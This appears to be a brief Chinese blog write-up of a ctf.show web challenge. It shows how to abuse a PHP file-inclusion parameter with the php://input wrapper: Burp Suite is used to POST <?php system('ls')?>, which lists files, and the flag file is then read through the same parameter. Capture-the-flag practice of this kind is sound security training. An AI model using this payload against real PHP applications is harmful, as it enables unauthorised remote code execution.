题目:https://ctf.show/challenges#web3-8
考点:伪协议

2025-02-05T07:41:22.png

使用bp抓包

1.配置端口
2025-02-05T09:03:15.png
2.抓包
2025-02-05T09:07:57.png
3.伪协议
?url=php://input -- GET请求的url中拼接伪协议
<?php system('ls')?> -- post请求内容构造需要执行的代码
如图
2025-02-05T09:35:01.png
发现文件
2025-02-05T09:33:31.png
很明显这个crf_go_go_go文件就是存放flag的文件

我们直接在url地址栏中拼接url参数,访问crf_go_go_go文件
?url=ctf_go_go_go
2025-02-05T09:38:17.png

添加新评论